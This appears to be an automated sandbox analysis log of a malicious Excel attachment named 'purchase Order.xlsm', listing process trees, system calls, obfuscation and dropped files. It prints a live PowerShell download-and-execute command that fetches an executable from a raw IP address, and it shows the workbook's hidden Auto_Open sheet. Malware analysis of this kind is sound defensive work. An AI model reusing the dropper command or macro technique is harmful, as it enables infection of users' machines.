Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004187AB NtAllocateVirtualMemory, 9_1_004187AB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A50 NtCreateFile,LdrInitializeThunk, 19_2_03319A50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_03319910
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_03319860
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319FE0 NtCreateMutant,LdrInitializeThunk, 19_2_03319FE0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_03319660
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033196E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_033196E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319540 NtReadFile,LdrInitializeThunk, 19_2_03319540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033195D0 NtClose,LdrInitializeThunk, 19_2_033195D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319B00 NtSetValueKey, 19_2_03319B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331A3B0 NtGetContextThread, 19_2_0331A3B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A20 NtResumeThread, 19_2_03319A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A10 NtQuerySection, 19_2_03319A10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A00 NtProtectVirtualMemory, 19_2_03319A00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A80 NtOpenDirectoryObject, 19_2_03319A80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319950 NtQueueApcThread, 19_2_03319950
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033199A0 NtCreateSection, 19_2_033199A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033199D0 NtCreateProcessEx, 19_2_033199D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319820 NtEnumerateKey, 19_2_03319820
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331B040 NtSuspendThread, 19_2_0331B040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319840 NtDelayExecution, 19_2_03319840
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033198A0 NtWriteVirtualMemory, 19_2_033198A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033198F0 NtReadVirtualMemory, 19_2_033198F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319730 NtQueryVirtualMemory, 19_2_03319730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331A710 NtOpenProcessToken, 19_2_0331A710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319710 NtQueryInformationToken, 19_2_03319710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331A770 NtOpenThread, 19_2_0331A770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319770 NtSetInformationFile, 19_2_03319770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319760 NtOpenProcess, 19_2_03319760
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033197A0 NtUnmapViewOfSection, 19_2_033197A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319780 NtMapViewOfSection, 19_2_03319780
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319610 NtEnumerateValueKey, 19_2_03319610
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319670 NtQueryInformationProcess, 19_2_03319670
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319650 NtQueryValueKey, 19_2_03319650
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033196D0 NtCreateKey, 19_2_033196D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331AD30 NtSetContextThread, 19_2_0331AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319520 NtWaitForSingleObject, 19_2_03319520
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319560 NtWriteFile, 19_2_03319560
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033195F0 NtQueryInformationFile, 19_2_033195F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C85D0 NtCreateFile, 19_2_009C85D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C8680 NtReadFile, 19_2_009C8680
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C87B0 NtAllocateVirtualMemory, 19_2_009C87B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C8700 NtClose, 19_2_009C8700
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C86FA NtClose, 19_2_009C86FA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C87AB NtAllocateVirtualMemory, 19_2_009C87AB
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\wlanext.exe Process Stats: CPU usage > 98%
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll C5D3FB8CC4B1BE9B9AABEEB14B7F4C12F3FCE5C8DFB0C1968C82D8B5C19B9245
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr codeName="ThisWorkbook"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Administrator\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><workbookProtection workbookAlgorithmName="SHA-512" workbookHashValue="g6J+U4jdDrb3WMKx8jWXEvB5PUnevNCnWu18PHNvGg3ndF21lKTVsvDW13wLgH7HS9vnHDRqP928qns3kCbkxA==" workbookSaltValue="p3a4TEPalWYAjtkycguiHw==" workbookSpinCount="100000" lockStructure="1"/><bookViews><workbookView xWindow="390" yWindow="390" windowWidth="21600" windowHeight="11385" firstSheet="1" activeTab="1"/></bookViews><sheets><sheet name="i0o86z" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet1" sheetId="1" r:id="rId2"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">i0o86z!$E$6</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
Source: purchase Order.xlsm Virustotal: Detection: 22%
Source: purchase Order.xlsm ReversingLabs: Detection: 40%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
Source: C:\Users\Public\eVJOpc.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe' Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{00931FDB-06EA-4BE4-B65D-68115E3B9413} - OProcSessId.dat Jump to behavior
Source: qqxmvpxcvyt.dll.8.dr Binary string: LanmanWorkstationLanmanServerc:\lanmanWorkgroupHOMEAdministrators\\Default-First-Site-NameNo commenthttp://https://SSL:%uhttphttps\DavWWWRoot@SSL80443AdministratorGuest_ldap._tcp.dc._msdcs.\Device\UnknownTransport_\Device\NetBT_Tcpip_LsaQueryInformationPolicy failed with NT status %x
Source: qqxmvpxcvyt.dll.8.dr Binary string: \Device\UnknownTransport_
Source: qqxmvpxcvyt.dll.8.dr Binary string: \Device\NetBT_Tcpip_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@15/13@0/1
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00402053 CoCreateInstance,MultiByteToWideChar, 8_2_00402053
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 8_2_00404292
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_01
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: purchase Order.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: 47E20000.0.dr Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: wntdll.pdbUGP source: eVJOpc.exe, 00000008.00000003.370323842.000000000F210000.00000004.00000001.sdmp, eVJOpc.exe, 00000009.00000002.452970458.0000000000B20000.00000040.00000001.sdmp, wlanext.exe, 00000013.00000002.564446547.00000000033CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: eVJOpc.exe, wlanext.exe
Source: Binary string: wlanext.pdb source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp
Source: Binary string: wlanext.pdbGCTL source: eVJOpc.exe, 00000009.00000002.452915644.0000000000AD0000.00000040.00020000.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_079427DB push ebx; ret 1_2_0794287A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0794DE80 push es; ret 1_2_0794DE90
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B87C push eax; ret 9_2_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B812 push eax; ret 9_2_0041B818
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B81B push eax; ret 9_2_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041C9B0 push dword ptr [E4BA1D0Dh]; ret 9_2_0041C9CF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00418B85 pushfd ; ret 9_2_00418B8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00415F20 push ebp; iretd 9_2_00415F21
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B7C5 push eax; ret 9_2_0041B818
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B9D0D1 push ecx; ret 9_2_00B9D0E4
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B87C push eax; ret 9_1_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B812 push eax; ret 9_1_0041B818
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B81B push eax; ret 9_1_0041B882
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041C9B0 push dword ptr [E4BA1D0Dh]; ret 9_1_0041C9CF
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00418B85 pushfd ; ret 9_1_00418B8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00415F20 push ebp; iretd 9_1_00415F21
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B7C5 push eax; ret 9_1_0041B818
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0332D0D1 push ecx; ret 19_2_0332D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB81B push eax; ret 19_2_009CB882
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB812 push eax; ret 19_2_009CB818
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB87C push eax; ret 19_2_009CB882
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CC9B0 push dword ptr [E4BA1D0Dh]; ret 19_2_009CC9CF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C8B85 pushfd ; ret 19_2_009C8B8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CB7C5 push eax; ret 19_2_009CB818
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C5F20 push ebp; iretd 19_2_009C5F21

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\Public\eVJOpc.exe File created: C:\Users\user\AppData\Local\Temp\nsz3A72.tmp\qqxmvpxcvyt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
